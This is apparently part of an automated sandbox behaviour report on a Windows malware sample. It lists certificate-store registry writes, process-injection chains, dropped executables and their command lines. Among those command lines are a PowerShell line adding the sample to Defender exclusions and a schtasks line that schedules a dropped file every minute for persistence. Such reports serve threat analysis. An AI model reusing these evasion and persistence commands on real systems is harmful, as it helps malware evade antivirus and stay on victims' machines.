7a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3332 wrote to memory of 2104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe
PID 3332 wrote to memory of 2104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe
PID 3332 wrote to memory of 2104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe
PID 3332 wrote to memory of 912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe
PID 3332 wrote to memory of 912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe
PID 3332 wrote to memory of 912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe
PID 2104 wrote to memory of 4188 N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2104 wrote to memory of 4188 N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2104 wrote to memory of 4188 N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 3332 wrote to memory of 4940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe
PID 3332 wrote to memory of 4940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe
PID 3332 wrote to memory of 4940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe
PID 3332 wrote to memory of 8 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe
PID 3332 wrote to memory of 8 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe
PID 3332 wrote to memory of 8 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe
PID 4188 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4188 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4188 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 3332 wrote to memory of 3956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe
PID 3332 wrote to memory of 3956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe
PID 3332 wrote to memory of 3956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe
PID 3332 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe
PID 3332 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe
PID 3332 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe
PID 3332 wrote to memory of 1732 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe
PID 3332 wrote to memory of 1732 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe
PID 4188 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3332 wrote to memory of 3212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe
PID 3332 wrote to memory of 3212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe
PID 3332 wrote to memory of 3212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe
PID 3332 wrote to memory of 1704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe
PID 3332 wrote to memory of 1704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe
PID 3332 wrote to memory of 1704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe
PID 3212 wrote to memory of 1512 N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp
PID 3212 wrote to memory of 1512 N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp
PID 3212 wrote to memory of 1512 N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp
PID 3332 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe
PID 3332 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe
PID 3332 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 3332 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 3332 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 2444 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 2444 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 2444 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 1704 wrote to memory of 4528 N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp
PID 1704 wrote to memory of 4528 N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp
PID 1704 wrote to memory of 4528 N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp
PID 4012 wrote to memory of 5020 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 5020 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 5020 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 5100 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

"C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

"C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe"

C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe

"C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe"

C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe

"C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe"

C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe

"C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe

"C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe"

C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe

"C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe"

C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe

"C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

"C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe" --silent --allusers=0

C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe

